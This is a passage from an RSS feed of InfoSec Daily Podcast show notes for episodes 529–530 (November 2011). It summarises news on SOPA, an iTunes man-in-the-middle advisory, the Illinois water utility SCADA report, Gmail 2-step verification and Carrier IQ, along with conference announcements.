	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What is new is that the attackers had tried to hit the DDoS defences, which suggests sophistication; attackers assumed that the organisation would have some defences in place that needed to be overcome. </span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.cnet.com/8301-31921_3-57329001-281/how-sopa-would-affect-you-faq"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-31921_3-57329001-281/how-sopa-would-affect-you-faq</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When Rep. Lamar Smith announced the Stop Online Piracy Act last month, he knew it was going to be controversial.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the Texas Republican probably never anticipated the broad and fierce outcry from Internet users that</span><a href="http://thomas.loc.gov/cgi-bin/bdquery/z?d112:h.r.03261:"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SOPA</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> provoked over the last week. It was a show of public opposition to Internet-related legislation not seen since the 2003 political wrangling over implanting copy-protection technology in PCs, or perhaps even the blue ribbons appearing on Web sites in the mid-1990s in response to the Communications Decency Act.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To learn how</span><a href="http://thomas.loc.gov/cgi-bin/bdquery/z?d112:h.r.03261:"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SOPA</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, and its Senate cousin known as the Protect IP Act, would affect you, keep reading. CNET has compiled a list of frequently asked questions on the topic:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: What&#39;s the justification for SOPA and Protect IP?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Two words: rogue sites. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: Who&#39;s opposed to SOPA?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Much of the Internet industry and a large percentage of Internet users. An informal poll of its readership by BetaNews</span><a href="http://betanews.com/2011/11/20/you-oppose-congress-kill-free-speech-on-the-internet-act/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">found</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that 95 percent oppose SOPA. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: How would SOPA work?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It allows the U.S. attorney general to seek a court order against the targeted offshore Web site that would, in turn, be served on Internet providers in an effort to make the target virtually disappear. It&#39;s kind of an Internet death penalty. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: How is SOPA different from the earlier Senate bill called the Protect IP Act?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Protect IP targeted only domain name system providers, financial companies, and ad networks&#8211;not companies that provide Internet connectivity. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: What are the security-related implications of SOPA?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One big one is how it interacts with the domain name system and a set of security improvements to it known as DNSSEC.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: What will SOPA require Internet providers to do?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A little-noticed portion of the proposed law, which CNET highlighted on Friday, goes further than Protect IP and could require Internet providers to monitor customers&#39; traffic and block Web sites suspected of copyright infringement. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: Are there free speech implications to SOPA?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SOPA&#39;s opponents say so&#8211;a New York Times op-ed</span><a href="http://www.nytimes.com/2011/11/16/opinion/firewall-law-could-infringe-on-free-speech.html?_r=3"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">called it</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the &quot;Great Firewall of America&#8211;and the language of the bill itself is quite broad. Section 103 says that, to be blacklisted, a Web site must be &quot;directed&quot; at the U.S. and also that the owner &quot;has promoted&quot; acts that can infringe copyright. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: Who supports SOPA?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The three organizations that have probably been the most vocal are the MPAA, the Recording Industry Association of America, and the U.S. Chamber of Commerce. A Politico</span><a href="http://www.politico.com/news/stories/1111/68448.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">chart</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> shows that Hollywood has outspent Silicon Valley by about ten-fold on lobbyists in the last two years. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-530-all-your-dna-scada-hacked-amazon-shipping-xbox-live-hacked-facebook-phone-mega-ddos-and-sopa-faq/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3192/0/infosec-daily-podcast-episode-530.mp3" length="26583394" type="audio/mpeg" />
		<itunes:duration>0:55:20</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 530 for November 23, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In orde[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 530 for November 23, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &#160;Dr. Bonez will have his weekend show on 11/26 9PM EST. &#160;The normal show will return on 11/28.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes &#38; Dan Houser (@1cissp on twitter)
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://moneyland.time.com/2011/10/27/now-credit-card-companies-want-your-dna/
	All Your DNA Are Belong To Us
	&#8220;According to a Visa patent application published in April, the company sees potential to use a wide array of personal details to create profiles that could be used for ad targeting well beyond shopping details. It describes the possibility of also using &#8220;information from social network websites, information from credit bureaus, information from search engines, information about insurance claims, information from DNA databanks,&#8221; and other sources.&#8221;
	&#8230;
	-thanks to Ciphersson for this story
	Source: &#160;http://www.allvoices.com/contributed-news/10935252-dhs-says-illinois-water-utility-wasnt-hacked
	On Tuesday, the Department of Homeland Security said it could not confirm a report from an Illinois intelligence fusion center which stated that an Illinois water utility had been hacked. The DHS and FBI had been working with the Curran-Gardner Public Water District in Springfield, Ill.
	Earlier, the Illinois Statewide Terrorism and Intelligence Center had reported an attack from a Russian IP address. The report said that by accessing a SCADA (supervisory control and data acquisition) system, the hackers had burned out a water pump at the facility.
	The statement, by DHS spokesman Chris Ortman, said:
	&#34;After detailed analysis, DHS and the FBI have found no evidence of a cyber intrusion into the SCADA system of the Curran-Gardner Public Water District in Springfield, Illinois. There is no evidence to support claims made in initial reports&#8211;which were based on raw, unconfirmed dat[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 529 &#8211; Friendly Google PSA, iTunes MitM, CIQ and Desist, Banned Scanners &amp; AT&amp;T</title>
		<link>http://www.isdpodcast.com/episode-529-friendly-google-psa-itunes-mitm-ciq-and-desist-banned-scanners-att</link>
		<comments>http://www.isdpodcast.com/episode-529-friendly-google-psa-itunes-mitm-ciq-and-desist-banned-scanners-att#comments</comments>
		<pubDate>Wed, 23 Nov 2011 01:53:19 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3188</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 529 for November 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Varun Sharma. Announcements: No Show on Thursday (11/24) or Friday (11/25). &#160; In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 529 for November 22, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No Show on Thursday (11/24) or Friday (11/25). &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &nbsp;Dr. Bonez will have his weekend show on 11/26. &nbsp;The normal show will return on 11/28.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://mashable.com/2011/11/22/google-2-step-verification-gmail/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2011/11/22/google-2-step-verification-gmail/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Did you know that</span><a href="http://mashable.com/category/google/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Google</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> offers 2-step login verification for Gmail accounts? The feature has been around a while, and now Google has written a reminder for all users who need an extra layer of security for their Gmail account and other services connected to it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition to logging into Gmail with your email and password, with 2-step verification you&rsquo;ll have to go through the added trouble of entering a code Google will send to your phone. This will &ldquo;approve&rdquo; the computer you&rsquo;re currently logging in from for 30 days, so you don&rsquo;t have to do this every time you log in.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you have a smartphone, you can also generate the code on your phone using the</span><a href="https://www.google.com/support/a/bin/answer.py?answer=1037451"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Google Authenticator</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> app.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Yes, entering an additional code is somewhat of a nuisance, but it would also greatly complicate matters for anyone who has gotten a hold of your password. To successfully log into your Gmail account, that person would also need to obtain your phone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In its</span><a href="https://plus.google.com/116899029375914044550/posts/HPzUPUk2raS"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Google emphasizes that this reminder is just &ldquo;general security advice, not an indication of an attack or compromise,&rdquo; but one has to wonder if the Redmond giant is seeing an increased number of complaints from users whose Gmail accounts have been compromised.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To enable 2-step verification for Gmail, go</span><a href="http://goo.gl/jEF7l"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://support.apple.com/kb/HT5030"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://support.apple.com/kb/HT5030</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Available for: Mac OS X v10.5 or later, Windows 7, Vista, XP SP2 or later</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Impact: A man-in-the-middle attacker may offer software that appears to originate from Apple</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Description: iTunes periodically checks for software updates using an HTTP request to Apple. This request may cause iTunes to indicate that an update is available. If Apple Software Update for Windows is not installed, clicking the Download iTunes button may open the URL from the HTTP response in the user&#39;s default browser. This issue has been mitigated by using a secured connection when checking for available updates. For OS X systems, the user&#39;s default browser is not used because Apple Software Update is included with OS X, however this change adds additional defense-in-depth.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CVE-2008-3434 : Francisco Amato of Infobyte Security Research</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Link: &nbsp;</span><a href="http://www.infobyte.com.ar/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infobyte.com.ar</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.eff.org/deeplinks/2011/11/carrieriq-censor-research-baseless-legal-threat"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deeplinks/2011/11/carrieriq-censor-research-baseless-legal-threat</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, security researcher Trevor Eckhart posted an</span><a href="http://androidsecuritytest.com/features/logs-and-services/loggers/carrieriq/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">analysis</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of software produced by Carrier IQ, which</span><a href="http://www.carrieriq.com/company/index.htm"><span 